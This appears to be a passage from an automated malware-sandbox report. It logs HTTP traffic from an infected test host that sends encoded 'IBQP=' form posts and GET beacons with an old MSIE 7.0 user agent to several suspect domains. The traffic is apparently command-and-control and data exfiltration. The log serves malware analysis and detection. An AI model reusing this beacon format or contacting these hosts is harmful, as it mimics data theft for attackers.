                                                                                                Data Ascii: IBQP=W/ZB1HR3mPTqyj+2lB7oDw783aJWx5pyPunxIyyizaSDj0maDXy5Ko6dfAYtdJzhH3QWb3xEl8W21iu62feDVW+ntnDZvUS19VK26BJU07zFHSzNMDYtJr45+PdpF/PEpNMuUySQYizDoDiqIiDHaJYaXDC2K45I0LfATCZs78s/PolxJIF5DtbUUVnNhRHReCU3+hPlXtM/q57fXcTrVDJH8AKr2Tg+szAuCUTcIfbDyja2GeHRoCbI8qXsBGD8uQfgjq0JZq8oMcWFEMA7cN1z2+TsjRcSMBlnzerDY0eQm16ureZOtnH6LlvM5tu8Ad88BI/a9Ve/Id0s9IyiXKDW3SOvmnmoJvp4dMhKpjWGta5mbDiF9lkJ/KsIifww7nRaGS47Awtd2XoT8hoSBbuHLVe77A/3hk/2jcJRudoWz4bzC0DYVdpsTWRcIIVK7Pw6r0Ig4cBsgPAmJaLCesuu8RLAmhXIb2iWCgAfHc0N5UGBKFCrozt1CcVVZ6CAOr0WftSB99Fpln0olEEnqOD/+NNB4oTv5U97zg0AMa3Op0RLGH1jKTkgfnBJS+9dwguQ+SZe3HnI2rgkDtriiuPyT8vqm8ORL+0LY3gzmO2e97XYGB5wEywyIX/9F2KoetYq5p33mjfDsmgUxbn/VxW+ljPhl6xw1fmFzL4Vhv4wZM7Kr4QCM/B3aYJmP/Q/dhQVIfAb8Cnojyawhb/vqxgS7bQhRfIRBSjgNbm0zqH+4Z0dKxaIbjhl4unZgT9cSnQJ/Ad20lT1wOTvau6DwCVJHS7akvbiYdt4ZKB/hrqk1ApI7TQgJNuPIOd+bHYtbSPB4BIrDqfIJSuWSVjX3aQzwQX4T/OmCyJXOV67m26wzWrULVC6zpqviL+ANpmhlkFSeqBBkxf2OMFoLySsi5mrlqd8xBJzXbbY3efmLiqePh1HtJNhZoLCQL6RcfGGs+dqRkX0gN+Fwg0yAF1G3aSCvGXZhqQDN1WLyyfzqN5tUrD [TRUNCATED]
                                                                                                Nov 11, 2024 17:06:03.116182089 CET5338OUTData Raw: 6a 42 32 65 37 4c 75 6c 6b 5a 70 6f 54 44 69 32 5a 4a 6a 62 56 35 39 75 6b 73 32 39 53 70 45 67 39 44 55 66 73 49 39 62 70 6c 4d 75 51 34 54 35 52 30 72 48 63 52 65 6d 4a 6c 77 45 65 37 45 4a 71 50 6a 44 6e 46 7a 50 63 31 4e 57 2b 45 6a 32 4d 54
                                                                                                Data Ascii: jB2e7LulkZpoTDi2ZJjbV59uks29SpEg9DUfsI9bplMuQ4T5R0rHcRemJlwEe7EJqPjDnFzPc1NW+Ej2MTrL5nd9HPEk1kqnKuqWW3PplWnCUvfSSl5u0LeCk263HsSnyJc9NMBURclnOA/WHf9oEPtY/QUWyKvXifW5VENZnyVpudzSJlX+0aWRkGjtUd7fi7pK9DJQFHMzzRR8JrbkPrkiTNgXsm6J0lDm/Xq+YgJO8yWzNwm
                                                                                                Nov 11, 2024 17:06:03.449050903 CET312INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:06:03 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 148
                                                                                                Connection: close
                                                                                                ETag: "66a747c1-94"
                                                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                77192.168.11.2049828154.23.184.9580
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:06:05.956892967 CET493OUTGET /nv0k/?Lr3=uHMLTHRPCpsdapr&IBQP=b9xh2wNitcKI3BLOmRjNajqJ0tdb3ZZVPMzZODjakpnC+heNAUn9ftCKfCQrWYHlPV0mdElsgMOd9Q6Pt9W1dBqGyTWsnEm56VmQ9Adh6JnhLBjPDA8XHds= HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.wcp95.top
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:06:06.273411989 CET312INHTTP/1.1 404 Not Found
                                                                                                Server: nginx
                                                                                                Date: Mon, 11 Nov 2024 16:06:06 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 148
                                                                                                Connection: close
                                                                                                ETag: "66a747c1-94"
                                                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                78192.168.11.204982913.248.169.4880
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:06:11.433247089 CET765OUTPOST /a5kc/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.thesquare.world
                                                                                                Origin: http://www.thesquare.world
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.thesquare.world/a5kc/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 4c 51 36 63 6d 63 2f 41 76 59 6f 54 6f 74 66 44 63 74 39 66 57 67 57 4c 77 73 43 4a 6c 4c 32 59 6d 67 45 51 36 4a 72 30 66 67 58 63 63 64 33 6d 4b 55 67 50 39 36 71 2f 38 61 34 52 66 75 46 45 6e 4f 48 56 6c 69 44 43 72 73 6f 4a 2f 32 6c 42 4d 38 38 59 32 4e 36 48 4a 53 6c 51 6a 2f 63 37 6e 55 63 5a 70 42 67 6d 54 49 43 2b 74 44 4a 72 78 67 57 53 75 43 4a 79 6b 56 52 45 63 70 72 6d 74 41 58 37 42 61 65 62 44 38 53 4f 31 6e 55 47 4d 6d 7a 67 76 47 53 59 4c 75 64 6b 32 74 6e 48 4c 4c 4f 53 48 41 78 51 39 4a 31 79 6f 42 35 30 67 63 4a 54 78 63 67 49 79 59 2f 37 59 69 73 73 66 67 3d 3d
                                                                                                Data Ascii: IBQP=LQ6cmc/AvYoTotfDct9fWgWLwsCJlL2YmgEQ6Jr0fgXccd3mKUgP96q/8a4RfuFEnOHVliDCrsoJ/2lBM88Y2N6HJSlQj/c7nUcZpBgmTIC+tDJrxgWSuCJykVREcprmtAX7BaebD8SO1nUGMmzgvGSYLudk2tnHLLOSHAxQ9J1yoB50gcJTxcgIyY/7Yissfg==


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                79192.168.11.204983013.248.169.4880
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:06:14.106084108 CET785OUTPOST /a5kc/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.thesquare.world
                                                                                                Origin: http://www.thesquare.world
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.thesquare.world/a5kc/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 4c 51 36 63 6d 63 2f 41 76 59 6f 54 6f 4e 50 44 64 4d 39 66 52 41 57 49 75 38 43 4a 72 72 33 77 6d 67 49 51 36 4d 62 6b 66 54 6a 63 53 5a 6e 6d 4c 56 67 50 2b 36 71 2f 33 36 34 51 51 4f 46 50 6e 4f 44 6e 6c 6a 2f 43 72 73 73 4a 2f 30 39 42 4e 4e 38 48 73 39 36 46 64 69 6c 53 2b 50 63 37 6e 55 63 5a 70 42 63 63 54 4a 71 2b 74 53 5a 72 77 45 4b 56 77 53 4a 78 30 46 52 45 4c 5a 72 69 74 41 58 4a 42 62 53 31 44 2b 61 4f 31 6d 6b 47 4e 30 62 6e 34 57 53 65 50 75 64 32 77 65 53 78 51 70 47 38 4e 48 56 51 6b 72 4e 75 70 58 30 75 39 75 39 33 79 50 38 36 32 6f 47 54 61 67 74 33 43 6c 37 65 62 64 32 42 50 7a 57 56 2b 53 4f 64 2b 47 4d 4f 49 4d 6b 3d
                                                                                                Data Ascii: IBQP=LQ6cmc/AvYoToNPDdM9fRAWIu8CJrr3wmgIQ6MbkfTjcSZnmLVgP+6q/364QQOFPnODnlj/CrssJ/09BNN8Hs96FdilS+Pc7nUcZpBccTJq+tSZrwEKVwSJx0FRELZritAXJBbS1D+aO1mkGN0bn4WSePud2weSxQpG8NHVQkrNupX0u9u93yP862oGTagt3Cl7ebd2BPzWV+SOd+GMOIMk=


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                80192.168.11.204983113.248.169.4880
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:06:16.776108027 CET6445OUTPOST /a5kc/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.thesquare.world
                                                                                                Origin: http://www.thesquare.world
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.thesquare.world/a5kc/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 4c 51 36 63 6d 63 2f 41 76 59 6f 54 6f 4e 50 44 64 4d 39 66 52 41 57 49 75 38 43 4a 72 72 33 77 6d 67 49 51 36 4d 62 6b 66 54 37 63 53 72 76 6d 4b 32 59 50 78 61 71 2f 72 71 34 72 51 4f 46 6f 6e 49 71 73 6c 6a 7a 30 72 75 6b 4a 2b 56 64 42 5a 70 49 48 69 4e 36 46 43 79 6c 54 6a 2f 64 2f 6e 51 41 64 70 48 38 63 54 4a 71 2b 74 51 78 72 33 51 57 56 79 53 4a 79 6b 56 52 49 63 70 72 4b 74 41 66 6a 42 62 57 4c 44 50 36 4f 32 47 30 47 4f 48 7a 6e 6e 6d 53 63 44 4f 63 6c 77 65 4f 69 51 70 71 4f 4e 48 4a 2b 6b 73 70 75 71 78 52 6e 36 63 4a 34 70 66 30 51 72 4a 36 35 4e 7a 74 65 4c 46 75 71 53 39 36 2b 48 47 62 47 35 52 75 71 76 30 67 2b 5a 34 4b 76 31 70 70 75 76 63 77 5a 4b 6d 57 42 35 59 61 63 56 2b 75 51 58 73 41 32 2f 34 74 33 30 2f 53 6a 64 74 2f 6b 35 45 34 64 45 6f 55 78 69 69 79 2b 6a 6d 53 56 37 50 4a 4e 32 75 50 66 6a 77 41 31 49 42 59 58 6c 48 57 6b 5a 4f 37 51 56 62 4f 4c 30 6d 64 45 44 55 35 69 50 2f 46 75 57 4a 4b 4b 53 43 67 72 4d 57 70 78 6d 6d 74 36 72 74 52 47 42 69 6d 59 59 [TRUNCATED]
                                                                                                Data Ascii: IBQP=LQ6cmc/AvYoToNPDdM9fRAWIu8CJrr3wmgIQ6MbkfT7cSrvmK2YPxaq/rq4rQOFonIqsljz0rukJ+VdBZpIHiN6FCylTj/d/nQAdpH8cTJq+tQxr3QWVySJykVRIcprKtAfjBbWLDP6O2G0GOHznnmScDOclweOiQpqONHJ+kspuqxRn6cJ4pf0QrJ65NzteLFuqS96+HGbG5Ruqv0g+Z4Kv1ppuvcwZKmWB5YacV+uQXsA2/4t30/Sjdt/k5E4dEoUxiiy+jmSV7PJN2uPfjwA1IBYXlHWkZO7QVbOL0mdEDU5iP/FuWJKKSCgrMWpxmmt6rtRGBimYYC2Re7c4+hRr7zZZQNcw/mkrylLwBURolI6IGpD8TNO3miCR9Gk60JMKyc8GjVZVkGtTMsf9GMu4PTGhfSql0TzHu6XGPUola18ZSy75beBMvOXdU01YwA/D3Rg0m5hXkrYUmmsWXp+b1h5wkrV5g2tm4bikj5lDoWWjD3SqhULQzutnoIVuTDfkzvNUDFj5wHooRp7m9F88eUf4V/qcXz6etJWAcl0T+tTO9GmX2MKATW5y1x1NOB5ImReSnKfIsMSaHXcLxJIAQgupeWU2K9f+KMhaH3en6kIPYsFh0i2x56qFJWQnW7O4Xy8eWlj0wRjIZaz25PAh7i6qjkTOzch6jU5WPsLCVSlW0fwpkFp28A/dhkbtRcKjXsWhU8dJZ38GGqIu9uxVgtaVkT23/OWQbZejSHzlOsiqBIKIX7KcaafH1z0QW+tqJ05DXLtn31mjUoSnGx+/GRvAxWb/qt2C/b0h+DW3Ew2z9Is4+icac4sm2vRJCMaJ1sHhxgAPvUjLAcMBxAWWPJYF8BaRNZ3wafiNOU0fOs/Y9JdjynCwumSqfVU6GDbZazvYVZcF0EuzUSY7mOHdVjILILEYO3mn7tHMXoVHVDAaHrWm8Vhy5v78WTW24SU8Z/otAQeCrbLLKvgdMjsixuIjNzBMlJF7kLgP6fQ1wXM [TRUNCATED]
                                                                                                Nov 11, 2024 17:06:16.776196957 CET1489OUTData Raw: 39 30 4e 78 36 73 75 7a 43 49 44 31 32 49 54 65 71 50 31 76 64 57 6a 6f 56 34 2f 36 48 74 4d 50 43 2b 70 38 74 64 67 6d 41 59 34 33 63 71 34 39 76 69 42 6f 30 42 41 71 41 4b 37 58 42 5a 70 36 6d 31 62 59 7a 51 70 53 48 78 5a 4a 76 31 71 4a 77 65
                                                                                                Data Ascii: 90Nx6suzCID12ITeqP1vdWjoV4/6HtMPC+p8tdgmAY43cq49viBo0BAqAK7XBZp6m1bYzQpSHxZJv1qJwept1Ll59geKJb2Lmaiey7nxG4xXaC+KSzovzJFQ8Fs21bYIXxqetBcQtoA5UMPvkhodAGAXdhGxjoSw10+dfpngjzlvQvw7Nzar5ADfE7p7h+/S1/fDc4aoTt4tA+6gORU9blCiVYR190Uf55MEhaEkpqFqUtWYa+z


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                81192.168.11.204983213.248.169.4880
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:06:19.444283009 CET499OUTGET /a5kc/?IBQP=GSS8lqfirIo3qKe7Y+dCXWv0mdSKk5n/ixY/743hYinZaJ7BEmItwuPe7a8fXvxPgKT6vw3k6f8F4VRaa+UbvaitD0wR/tUqvXopoFkCCKedzBtE3j2pmTo=&Lr3=uHMLTHRPCpsdapr HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Language: en-us
                                                                                                Host: www.thesquare.world
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Nov 11, 2024 17:06:19.588090897 CET400INHTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Mon, 11 Nov 2024 16:06:19 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 260
                                                                                                Connection: close
                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 42 51 50 3d 47 53 53 38 6c 71 66 69 72 49 6f 33 71 4b 65 37 59 2b 64 43 58 57 76 30 6d 64 53 4b 6b 35 6e 2f 69 78 59 2f 37 34 33 68 59 69 6e 5a 61 4a 37 42 45 6d 49 74 77 75 50 65 37 61 38 66 58 76 78 50 67 4b 54 36 76 77 33 6b 36 66 38 46 34 56 52 61 61 2b 55 62 76 61 69 74 44 30 77 52 2f 74 55 71 76 58 6f 70 6f 46 6b 43 43 4b 65 64 7a 42 74 45 33 6a 32 70 6d 54 6f 3d 26 4c 72 33 3d 75 48 4d 4c 54 48 52 50 43 70 73 64 61 70 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?IBQP=GSS8lqfirIo3qKe7Y+dCXWv0mdSKk5n/ixY/743hYinZaJ7BEmItwuPe7a8fXvxPgKT6vw3k6f8F4VRaa+UbvaitD0wR/tUqvXopoFkCCKedzBtE3j2pmTo=&Lr3=uHMLTHRPCpsdapr"}</script></head></html>


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                82192.168.11.20498333.33.130.19080
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:06:24.725188971 CET777OUTPOST /5lh9/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.bocadolobopetra.net
                                                                                                Origin: http://www.bocadolobopetra.net
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 201
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.bocadolobopetra.net/5lh9/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 43 59 5a 72 38 38 4f 75 4d 51 42 6e 58 6e 2b 51 78 4a 7a 32 72 56 4e 71 59 6e 33 30 70 47 30 78 73 65 72 73 2b 57 53 68 35 53 35 7a 78 73 33 53 74 69 73 53 39 37 34 79 35 57 30 77 55 41 53 45 5a 43 47 45 48 6a 52 63 71 56 66 32 77 30 36 58 6b 55 58 39 62 76 30 31 33 65 76 51 48 4f 70 30 51 53 38 32 62 2b 79 57 49 61 42 56 48 47 45 65 76 33 59 56 6f 4c 75 51 69 45 44 55 43 58 46 53 30 55 61 63 65 35 79 6b 7a 52 59 2f 57 4f 31 45 59 43 53 76 39 38 31 45 43 38 72 59 58 62 6d 62 35 75 61 64 61 62 38 35 37 5a 6f 67 79 77 4f 43 41 6f 30 37 30 4a 4d 34 2b 4b 6b 75 67 30 34 43 54 51 3d 3d
                                                                                                Data Ascii: IBQP=CYZr88OuMQBnXn+QxJz2rVNqYn30pG0xsers+WSh5S5zxs3StisS974y5W0wUASEZCGEHjRcqVf2w06XkUX9bv013evQHOp0QS82b+yWIaBVHGEev3YVoLuQiEDUCXFS0Uace5ykzRY/WO1EYCSv981EC8rYXbmb5uadab857ZogywOCAo070JM4+Kkug04CTQ==


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                83192.168.11.20498343.33.130.19080
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:06:27.399358034 CET797OUTPOST /5lh9/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.bocadolobopetra.net
                                                                                                Origin: http://www.bocadolobopetra.net
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 221
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.bocadolobopetra.net/5lh9/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 43 59 5a 72 38 38 4f 75 4d 51 42 6e 57 47 4f 51 7a 71 62 32 36 6c 4e 70 42 58 33 30 67 6d 30 31 73 65 76 73 2b 55 2b 78 35 67 64 7a 78 4d 48 53 75 6d 59 53 30 72 34 79 67 6d 31 62 62 67 53 66 5a 43 4b 71 48 6e 4e 63 71 52 33 32 77 31 4b 58 6b 6e 50 2b 61 2f 30 7a 76 75 76 53 4a 75 70 30 51 53 38 32 62 34 66 7a 49 62 70 56 48 32 30 65 76 57 59 53 33 37 75 54 79 55 44 55 54 48 46 57 30 55 61 79 65 34 76 42 7a 53 67 2f 57 4d 64 45 5a 51 36 73 33 38 31 47 4d 63 71 49 55 4a 4c 58 68 74 61 36 63 6f 55 51 69 63 77 39 7a 6d 44 59 64 61 41 66 33 61 51 4b 36 36 64 47 69 32 35 5a 4f 5a 6f 70 38 74 50 33 75 36 2f 4f 54 50 43 4d 63 72 6b 64 77 73 4d 3d
                                                                                                Data Ascii: IBQP=CYZr88OuMQBnWGOQzqb26lNpBX30gm01sevs+U+x5gdzxMHSumYS0r4ygm1bbgSfZCKqHnNcqR32w1KXknP+a/0zvuvSJup0QS82b4fzIbpVH20evWYS37uTyUDUTHFW0Uaye4vBzSg/WMdEZQ6s381GMcqIUJLXhta6coUQicw9zmDYdaAf3aQK66dGi25ZOZop8tP3u6/OTPCMcrkdwsM=


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                84192.168.11.20498353.33.130.19080
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Nov 11, 2024 17:06:30.052366972 CET1289OUTPOST /5lh9/ HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-us
                                                                                                Host: www.bocadolobopetra.net
                                                                                                Origin: http://www.bocadolobopetra.net
                                                                                                Cache-Control: no-cache
                                                                                                Content-Length: 7369
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                Referer: http://www.bocadolobopetra.net/5lh9/
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; GWX:QUALIFIED; MASMJS)
                                                                                                Data Raw: 49 42 51 50 3d 43 59 5a 72 38 38 4f 75 4d 51 42 6e 57 47 4f 51 7a 71 62 32 36 6c 4e 70 42 58 33 30 67 6d 30 31 73 65 76 73 2b 55 2b 78 35 67 56 7a 77 2b 50 53 74 42 45 53 6d 37 34 79 2f 57 31 59 62 67 53 65 5a 43 43 6d 48 6e 42 6d 71 54 50 32 78 54 32 58 31 47 50 2b 51 2f 30 7a 6d 4f 76 54 48 4f 70 74 51 53 73 4d 62 34 76 7a 49 62 70 56 48 30 73 65 34 58 59 53 6b 72 75 51 69 45 44 49 43 58 46 2b 30 53 79 45 65 34 72 2f 7a 6a 41 2f 57 73 4e 45 61 6c 4f 73 2f 38 31 41 50 63 72 4e 55 4a 47 56 68 74 47 32 63 70 67 36 69 62 73 39 79 77 65 7a 4a 36 30 66 68 4b 45 47 78 34 56 37 74 77 31 39 4d 6f 51 78 77 63 54 6f 67 39 7a 46 64 4e 57 42 42 71 30 5a 72 37 47 48 57 79 2f 31 30 47 46 6f 38 67 4a 34 5a 47 66 74 7a 63 6b 55 5a 6a 71 53 68 42 34 4b 47 4e 4b 57 58 50 37 54 2f 4d 6a 45 6b 37 38 44 31 63 50 51 4f 74 6a 74 59 4a 4b 66 70 59 6c 6a 6a 37 6e 67 6a 42 50 65 57 30 58 5a 57 54 4a 35 50 76 41 59 6d 36 30 61 5a 31 63 48 43 6c 32 62 55 65 79 47 76 70 68 32 48 53 35 4d 30 4d 71 7a 41 66 45 77 51 65 4a 4b 6a [TRUNCATED]
                                                                                                Data Ascii: IBQP=CYZr88OuMQBnWGOQzqb26lNpBX30gm01sevs+U+x5gVzw+PStBESm74y/W1YbgSeZCCmHnBmqTP2xT2X1GP+Q/0zmOvTHOptQSsMb4vzIbpVH0se4XYSkruQiEDICXF+0SyEe4r/zjA/WsNEalOs/81APcrNUJGVhtG2cpg6ibs9ywezJ60fhKEGx4V7tw19MoQxwcTog9zFdNWBBq0Zr7GHWy/10GFo8gJ4ZGftzckUZjqShB4KGNKWXP7T/MjEk78D1cPQOtjtYJKfpYljj7ngjBPeW0XZWTJ5PvAYm60aZ1cHCl2bUeyGvph2HS5M0MqzAfEwQeJKjTpJvDwNYKOrCxibTpwfDpr7WtYKaRmdC7g60x4EtNhcDZsR5D3ZA1dHDJbk1+2Wu18xhqQjSaSdmoqPhF0J0z1EdppL3o/eJw6FIrXCecpJnfVc2bclygNd/x2f7OAcQDj6cXSQv62kLYL0Y88sucjzmhATf91hnuFOg+aw/M0Skr1xVo/rhZb7U1cTahV8927hXs5QJeBGFFTqgyi4jErCYXf6kqB3p0HbHTO5xWkYTdRMftywveTNBADP3PNLlfPaiu5k9xZyLconCuC8XgtcqjEM3xe9byb5q9HTSNv8GVYYuVPf6BzWNFDS6/1marNCEfCAbZXHnpMlUZsOWseohhhEj5k0nCh4xEQ3/GiAjb4AdZ15lRQ
                                                                                                Nov 11, 2024 17:06:30.052416086 CET3867OUTData Raw: 77 70 30 67 61 48 36 77 7a 41 31 5a 63 44 42 50 52 67 6e 68 47 78 38 66 50 2f 44 46 35 67 51 7a 4c 6e 55 76 39 6b 51 70 64 55 44 54 57 46 63 78 2f 46 55 52 4e 4b 4f 74 62 66 66 6c 54 54 6b 50 74 4b 58 6c 4e 66 65 57 4f 34 2b 30 6c 53 79 2b 4b 2f
                                                                                                Data Ascii: wp0gaH6wzA1ZcDBPRgnhGx8fP/DF5gQzLnUv9kQpdUDTWFcx/FURNKOtbfflTTkPtKXlNfeWO4+0lSy+K/YIt4R8IqRts+omMG8LfGVICijT9Sjw9nzGveshZN8ukm2+kNVjAQ8BMo26Ysacpa0YNmQ0VmYWgj+oMWrCadlKtuLOzZZHSs1m9U4DqUVtChPom0Rj4ahasovGuAlx5ctE4TOEDrpXDUa8JT0wxOiBR+M1erFd+Mo
                                                                                                Nov 11, 2024 17:06:30.052464962 CET2790OUTData Raw: 2b 69 76 6a 7a 70 44 79 6b 2f 6a 4e 61 50 52 51 6e 46 32 45 67 44 6b 34 36 63 46 74 57 4d 48 42 4f 45 68 5a 47 6f 55 43 42 6e 63 6b 68 4e 75 70 43 6c 54 56 71 72 62 45 6e 54 6c 30 37 79 51 43 75 67 62 62 2f 31 6a 50 2f 75 45 68 50 6c 67 58 32 4d
                                                                                                Data Ascii: +ivjzpDyk/jNaPRQnF2EgDk46cFtWMHBOEhZGoUCBnckhNupClTVqrbEnTl07yQCugbb/1jP/uEhPlgX2MT9ukmoyd7l7uQskX+z1We3f8Du65Orw6wm2ETiO8Mfuawu2QIKqmBRrfl1nmGyr+VRybV6jEaRJTLDvhHduUfB3TL6FPKbNL8ijSiLPid+7Q59I+PLDIgGyFBZZvb/pkV/s3lwOFEXe39poQYzyPvmGIbTCqo8hp2


